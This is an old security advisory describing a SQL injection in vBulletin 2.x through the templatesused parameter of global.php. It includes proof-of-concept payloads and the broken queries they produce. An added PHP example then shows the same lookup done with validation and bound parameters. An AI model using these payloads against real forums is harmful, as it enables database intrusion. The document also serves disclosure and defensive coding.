
Vbulletin 2.X sql injection



Hello,

Vbulletin 2.X sql injection

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

This is an SQL injection in vBulletin systems.

The injection is in the global.php file.

We can use it:

global.php?templatesused=))/*

The query will be:
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

It can be used as shell injection.

Tested on VB 2.3.X; other 2.X versions are also affected.

#WwW.SoQoR.NeT
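
A defensive sketch of how the templatesused list can feed the title IN (...) lookup without request data being concatenated into the SQL text. This is an added example, not vBulletin's code and not part of the original advisory. The function names, the assumed title alphabet and the in-memory SQLite table are assumptions; the table and column names follow the query quoted above.

```php
<?php
// Added example, not vBulletin code. Table and column names follow the query
// quoted in the advisory; function names and the title alphabet are assumptions.

/** Split the comma-separated parameter, keeping only plausible template titles. */
function parse_template_names(string $raw, int $max = 50): array
{
    $names = [];
    foreach (explode(',', $raw) as $name) {
        $name = trim($name);
        // Assumed alphabet: letters, digits, underscore (e.g. 'pagenav_curpage').
        if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name) === 1) {
            $names[] = $name;
        }
    }
    return array_slice(array_values(array_unique($names)), 0, $max);
}

/** Load templates with one bound placeholder per title; no value is spliced into SQL. */
function fetch_templates(PDO $db, array $requested, array $defaults, int $setId): array
{
    $titles = array_values(array_unique(array_merge($requested, $defaults)));
    if ($titles === []) { return []; }
    $marks = implode(',', array_fill(0, count($titles), '?'));
    $stmt = $db->prepare(
        "SELECT title, template FROM template WHERE title IN ($marks)
         AND (templatesetid = -1 OR templatesetid = ?) ORDER BY templatesetid"
    );
    foreach ($titles as $i => $title) {
        $stmt->bindValue($i + 1, $title, PDO::PARAM_STR);
    }
    $stmt->bindValue(count($titles) + 1, $setId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);   // title => template
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE template (title TEXT, template TEXT, templatesetid INTEGER)");
$db->exec("INSERT INTO template VALUES ('header','<h1>',1), ('footer','<hr>',1), ('nn','x',1)");

// The two parameter values from the advisory, handled as data.
foreach (["))/*", "nn,dd,'))/*"] as $raw) {
    $names = parse_template_names($raw);
    $rows  = fetch_templates($db, $names, ['header', 'footer'], 1);
    printf("accepted=[%s] loaded=[%s]\n", implode(',', $names), implode(',', array_keys($rows)));
}
```

For the first value no name passes validation; for the second only nn and dd are kept. In both cases the statement text is fixed before any request data is bound.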
